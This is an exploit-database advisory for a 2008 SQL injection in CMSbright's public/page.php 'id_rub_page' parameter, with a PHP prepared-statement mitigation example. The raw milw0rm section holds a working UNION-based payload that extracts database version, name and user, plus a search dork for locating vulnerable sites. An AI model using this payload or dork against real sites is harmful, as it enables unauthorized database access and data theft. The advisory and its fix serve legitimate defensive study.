Vendor: CMSbright
By: BorN To K!LL
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: CMSbright
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CMSbright SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in CMSbright to execute arbitrary SQL commands on the underlying database. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'id_rub_page' parameter of the 'public/page.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information stored in the database, modification of data, and even execution of arbitrary system commands on the server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries.
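
One way to apply this to the 'id_rub_page' parameter, shown as an added example that is not CMSbright's code and not part of the original advisory. The table, column and function names are hypothetical, because the page does not show the application's schema or query; the example also goes one step beyond validation by binding the value in a prepared statement, and it assumes the pdo_sqlite driver so that it runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for the table that page.php reads from.
function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE rub_page (id INTEGER PRIMARY KEY, title TEXT, body TEXT, position INTEGER)');
    $db->exec("INSERT INTO rub_page VALUES (1, 'Home', 'Welcome', 1)");
    return $db;
}

// Allow-list validation: only a positive decimal integer is accepted.
function parse_rubric_id($raw): ?int
{
    if (!is_string($raw)) {          // e.g. id_rub_page[]=1 arrives as an array
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The value is bound as an integer and never concatenated into the SQL text.
function fetch_page(PDO $db, $raw): ?array
{
    $id = parse_rubric_id($raw);
    if ($id === null) {
        return null;                 // caller should answer with 400 or 404
    }
    $stmt = $db->prepare('SELECT id, title, body, position FROM rub_page WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs; the second is the URL-decoded example string from this page.
// In page.php the argument would be $_GET['id_rub_page'] ?? null.
$db = open_demo_db();
$inputs = ['1', '-9990 union all select concat(version(),database(),user()),2,3,4--', '1 OR 1=1', '42'];
foreach ($inputs as $raw) {
    $row = fetch_page($db, $raw);
    printf("%-68s => %s\n", $raw, $row === null ? 'rejected or not found' : $row['title']);
}
```

Only the first input returns a row; the two injection strings fail integer validation before any SQL runs, and '42' is a valid id with no matching row.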

Exploit-DB raw data:

-------------------------------------------
Script  :  CMSbright ..
 
site     :  http://www.cmsbright.com/
 
Author :  BorN To K!LL
 
Dork    :  powered by CMSbright © websens
-------------------------------------------
 
Exploit   :
 
public/page.php?id_rub_page=[SQL]
 
Example :
 
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
 
-------------------------------------------  
Greets :
 
Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
 
-------------------------------------------

# milw0rm.com [2008-09-01]